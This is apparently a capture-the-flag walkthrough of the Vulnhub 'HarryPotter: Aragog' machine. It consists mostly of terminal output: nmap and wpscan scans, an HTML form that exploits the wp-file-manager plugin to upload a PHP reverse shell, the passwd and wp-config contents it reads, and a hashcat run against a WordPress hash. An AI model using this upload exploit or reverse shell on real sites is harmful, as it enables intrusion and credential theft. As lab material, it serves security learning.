HARRYPOTTER: ARAGOG | Vulnhub Walkthrough

Let’s do another cool machine of Vulnhub from @Mansoor R

Aragog is the 1st VM of 3-box HarryPotter.

┌──(root💀kali)-[~/vm/arogya]
└─# nmap 192.168.1.101
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-06 10:16 IST
Nmap scan report for 192.168.1.101
Host is up (0.00061s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

MAC Address: 08:00:27:57:94:99 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.66 seconds
┌──(root💀kali)-[~/vm/arogya]
└─# nmap -sV -sC -A -vv -p- -oA 192.168.1.101 192.168.1.101
# Nmap 7.91 scan initiated Wed May 5 14:50:04 2021 as: nmap -sV -sC -A -vv -p- -oA 192.168.1.101 192.168.1.101
Nmap scan report for 192.168.1.101
Host is up, received arp-response (0.00073s latency).
Scanned at 2021-05-05 14:50:05 IST for 10s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 48:df:48:37:25:94:c4:74:6b:2c:62:73:bf:b4:9f:a9 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDSJJ1ZAbIA3lP2RbpxnhknzLJqrHne4be3xTLmVEXWg7YQ6FFZ/RA1VzmrFYPlvB1t1XwopptI+nA9BSG5+hllLyCQ1pDZkhIwyGHuBLZETD8cIJTlsxVCwnh67h7eeK4hTEtjp1rUodK30juDf5u7JnkwVfo78LvM8WV1LjVrmhsZiqzy1CxAoMFpiRp3ZlvpblL3gdd0wgSNrGqEwc6qJc6Z+RKGkLbnpgTnOsc6vGLs1xFOGrHF2qFeDpUWti0ZDSN31LtP1HtNItbBKSECcFD3KrN8nPaZCa2V9GA1jrpOOAF1j0ehcRlBoFqLZzQbO9RFeIkgqGNrz3PDt7vp
| 256 1e:34:18:17:5e:17:95:8f:70:2f:80:a6:d5:b4:17:3e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBESZsj5u/F88CLIXTeBD8OgiCM2u8sKBgbvvjKccwFmCBMh3GmOHGP8qzzQwVTMkq1aN0WSIk7h8/cHCT2tZLzE=
| 256 3e:79:5f:55:55:3b:12:75:96:b4:3e:e3:83:7a:54:94 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMsH4OtBIy/He42Rc6KvtI6w2855JMLVloVFy5/0Rtj4
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:57:94:99 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=5/5%OT=22%CT=1%CU=37181%PV=Y%DS=1%DC=D%G=Y%M=080027%TM
OS:=6092634F%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S
┌──(root💀kali)-[~/vm/arogya]
└─# wpscan --url http://192.168.1.101/blog/ --enumerate ap --plugins-detection aggressive --plugins-version-detection aggressive
<html><body><form method="POST" enctype="multipart/form-data" action="http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"><input type="hidden" name="cmd" value="upload"/><input type="hidden" name="target" value="l1_Lw"/><input type="file" name="upload[]"/><br/><br/><input type="submit" value="Upload"/></form></body>
File : /blog/wp-content/plugins/wp-file-manager/lib/php/../files/php-reverse-shell.php
gi**y:x:1001:1001::/home/XXXX:/bin/sh
ha****98:x:1000:1000:XXXX,,,:/home/XXXX:/bin/bash
<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'my******ss');
define('DB_HOST', 'localhost');
define('DB_COLLATE', 'utf8_general_ci');
define('WP_CONTENT_DIR', '/xxxxx/xxxxx/xxxx/xxxx');
?>
hagrid98:$P$BY**************JDHtc.
┌──(root💀kali)-[~/vm/arogya]
└─# hashcat -O -a 0 -m 400 hash /usr/share/wordlists/rockyou.txt -o result.txt
horcrux_{RiXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXets}
horcrux_{maXXXXXXXXXXXXXXXXXXXXXXXXXXXXXOre}